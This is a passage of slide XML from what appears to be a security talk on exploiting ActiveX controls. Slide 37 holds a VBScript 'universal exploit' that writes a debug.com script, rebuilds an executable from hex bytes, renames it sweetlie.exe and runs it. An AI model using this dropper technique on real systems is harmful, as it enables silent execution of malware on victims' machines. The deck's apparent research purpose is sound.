            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>fso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Set f = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>fso.CreateTextFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("sweetlie.txt", true)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>f.WriteLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("Nsweetlie.dat")		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ file name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>f.WriteLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("A")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>f.WriteLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("DW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5A4D 0090 0003 0000 0004 0000 FFFF 0000 00B8 0000 0000 0000 0040 0000 0000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ file contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>f.WriteLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>f.WriteLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("R CX")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>f.WriteLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("001E")			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ file size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>f.WriteLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("W")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>f.WriteLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("Q")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>f.Close</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Set shell = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>shell.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> /c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>debug.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> &lt; sweetlie.txt",true,1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>shell.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> /c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> sweetlie.dat sweetlie.exe",true,1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>shell.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> "sweetlie.exe"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5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B013311-0FD4-4D64-AC5C-4DA4350A3905}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4198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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Universal Exploit to Create a Binary File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{4B0D3007-87A9-4038-9BA7-87957B0E7829}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011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ko-KR" dirty="0" smtClean="0"/>
              <a:t>4 Windows Vista and ActiveX Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012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/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="1954213"/>
            <a:ext cx="5446712" cy="441325"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449337" tIns="45654" rIns="91306" bIns="45654" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Introduction to ActiveX Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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43014" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="2889250"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12796"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Potentially Vulnerable Control Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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43015" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="3897313"/>
            <a:ext cx="5446712" cy="439737"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DBCS and Universal Exploit Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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43016" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2397125" y="4833938"/>
            <a:ext cx="6407150" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="2F2F76"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="6666FF"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="2F2F76"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Windows Vista and ActiveX Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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861190" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="1809750"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861191" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="2733675"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861192" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="3741738"/>
            <a:ext cx="681037" cy="642937"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861193" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1889125" y="4667250"/>
            <a:ext cx="801688" cy="755650"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43021" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="5842000"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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861197" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="5686425"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5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656FC98-31BB-4ADA-B47F-44EBE032BAF8}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4403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ko-KR" smtClean="0"/>
              <a:t>ActiveX Control Capability Comparison Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4403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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX control can only read files or registry keys silently on Windows Vista</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Group 118"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
